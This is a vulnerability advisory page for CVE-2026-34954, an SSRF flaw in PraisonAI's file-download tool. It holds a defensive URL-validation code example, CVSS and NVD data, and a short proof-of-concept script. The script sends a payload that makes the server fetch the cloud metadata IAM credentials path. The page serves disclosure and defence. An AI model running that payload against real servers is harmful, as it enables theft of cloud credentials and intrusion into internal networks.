Security Vulnerability Report
CVE-2026-34954 CVSS 8.6 HIGH

CVE-2026-34954

Published: 2026-04-03 23:17:07
Last Modified: 2026-04-13 18:46:18

Description

PraisonAI is a multi-agent teams system. Prior to version 1.5.95, FileTools.download_file() in praisonaiagents validates the destination path but performs no validation on the url parameter, passing it directly to httpx.stream() with follow_redirects=True. An attacker who controls the URL can reach any host accessible from the server including cloud metadata services and internal network services. This issue has been patched in version 1.5.95.
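The defect described above is a classic server-side request forgery (SSRF): the destination path is checked, but the url parameter goes straight to a client that follows redirects, so both the initial URL and every redirect hop need to be validated before the server connects. The following is an added illustration of that hardening and is not PraisonAI's own code or its 1.5.95 patch; the function names (validate_url, is_safe_url, safe_download, run_demo), the use of the standard-library urllib in place of httpx, and the redirect chain in run_demo (including the 93.184.216.34 address) are all constructed for the example.

```python
# Hardened downloader: validate the URL before the first request and again at
# every redirect hop, instead of handing an unchecked URL to a client that
# follows redirects on its own. Hypothetical example, not PraisonAI code.
import ipaddress
import socket
import urllib.error
import urllib.request
from urllib.parse import urljoin, urlparse

ALLOWED_SCHEMES = {"http", "https"}
REDIRECT_CODES = {301, 302, 303, 307, 308}
MAX_REDIRECTS = 5


class UnsafeURL(ValueError):
    """Raised for any URL the server must not fetch on a caller's behalf."""


def _is_public(ip):
    # Unwrap IPv4-mapped IPv6 (::ffff:169.254.169.254) so the IPv4 checks apply.
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def validate_url(url, resolver=socket.getaddrinfo):
    """Reject non-http(s) schemes and hosts that resolve to a non-public address.
    `resolver` is injectable so the check can be exercised offline."""
    parts = urlparse(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        raise UnsafeURL(f"scheme not allowed: {parts.scheme!r}")
    host = parts.hostname
    if not host:
        raise UnsafeURL("URL has no host")
    try:
        addrs = [ipaddress.ip_address(host)]  # IP literal, no DNS needed
    except ValueError:
        port = parts.port or (443 if parts.scheme == "https" else 80)
        try:
            infos = resolver(host, port, type=socket.SOCK_STREAM)
        except OSError as exc:
            raise UnsafeURL(f"cannot resolve {host!r}") from exc
        # sockaddr[0] is the address; strip an IPv6 scope id such as %eth0
        addrs = [ipaddress.ip_address(info[4][0].split("%")[0]) for info in infos]
    for addr in addrs:
        if not _is_public(addr):
            raise UnsafeURL(f"{host!r} resolves to non-public address {addr}")
    return parts


def is_safe_url(url, resolver=socket.getaddrinfo):
    """Boolean form of validate_url for callers that prefer a check to an exception."""
    try:
        validate_url(url, resolver=resolver)
        return True
    except UnsafeURL:
        return False


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    # Returning None makes urllib surface 3xx responses as HTTPError instead of following them.
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def stdlib_fetch(url, timeout=10):
    """Fetch one URL without following redirects. Returns (status, location, body)."""
    opener = urllib.request.build_opener(_NoRedirect())
    try:
        with opener.open(url, timeout=timeout) as resp:
            return resp.status, None, resp.read()
    except urllib.error.HTTPError as err:
        if err.code in REDIRECT_CODES:
            return err.code, err.headers.get("Location"), b""
        raise


def safe_download(url, fetch=stdlib_fetch, resolver=socket.getaddrinfo):
    """Follow redirects by hand so every hop passes validate_url; return the final body."""
    current = url
    for _ in range(MAX_REDIRECTS + 1):
        validate_url(current, resolver=resolver)
        status, location, body = fetch(current)
        if status not in REDIRECT_CODES:
            return body
        if not location:
            raise UnsafeURL(f"{status} redirect without a Location header")
        current = urljoin(current, location)  # Location may be relative
    raise UnsafeURL(f"more than {MAX_REDIRECTS} redirects")


def run_demo():
    """Constructed offline scenario: a public start URL redirects to the metadata service."""
    def fake_fetch(url):
        # Simulated server; 93.184.216.34 is a constructed public address, not a target.
        if url == "http://93.184.216.34/start":
            return 302, "http://169.254.169.254/latest/meta-data/", b""
        return 200, None, b"harmless content"
    results = {}
    try:
        safe_download("http://93.184.216.34/start", fetch=fake_fetch)
        results["redirect_to_metadata"] = "allowed"
    except UnsafeURL as exc:
        results["redirect_to_metadata"] = f"blocked: {exc}"
    results["direct_public"] = safe_download("http://93.184.216.34/file", fetch=fake_fetch)
    return results
```

The point of disabling automatic redirects is that a URL which passes validation can still redirect to 169.254.169.254 or 127.0.0.1; the loop in safe_download re-runs the check on each Location before connecting. Two caveats remain for a production version: the address is resolved once here and again by the HTTP client, so a DNS rebinding attack between the two lookups is not covered (pinning the validated IP in the connection, or validating inside the client's connect hook, closes that gap), and an explicit allowlist of permitted hosts is stronger than the denylist of address ranges used here.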

CVSS Details

CVSS Score
8.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:praison:praisonaiagents:*:*:*:*:*:*:*:* - VULNERABLE
PraisonAI < 1.5.95

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python

import requests

# Target URL of the vulnerable PraisonAI endpoint
# This endpoint triggers the vulnerable FileTools.download_file() function
target_url = "http://vulnerable-target/api/download"

# Malicious payload targeting internal metadata service (SSRF)
# The application does not validate the URL, allowing access to 127.0.0.1 or metadata services
payload = {
    "url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name",
    "destination_path": "/tmp/metadata.txt"
}

try:
    print("[+] Sending SSRF payload to target...")
    response = requests.post(target_url, json=payload, timeout=10)
    if response.status_code == 200:
        print("[+] Request successful. Check if data was leaked.")
        print("Response:", response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-44c2-3rw4-5gvh - Exploit, Vendor Advisory

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-34954",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-03T23:17:06.810",
    "lastModified": "2026-04-13T18:46:18.453",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "PraisonAI is a multi-agent teams system. Prior to version 1.5.95, FileTools.download_file() in praisonaiagents validates the destination path but performs no validation on the url parameter, passing it directly to httpx.stream() with follow_redirects=True. An attacker who controls the URL can reach any host accessible from the server including cloud metadata services and internal network services. This issue has been patched in version 1.5.95."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
            "baseScore": 8.6,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 4.0
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-918"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:praison:praisonaiagents:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "1.5.95",
                "matchCriteriaId": "549FBB43-121A-41E9-B6E6-FC14EC23A7B3"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-44c2-3rw4-5gvh",
        "source": "[email protected]",
        "tags": [
          "Exploit",
          "Vendor Advisory"
        ]
      }
    ]
  }
}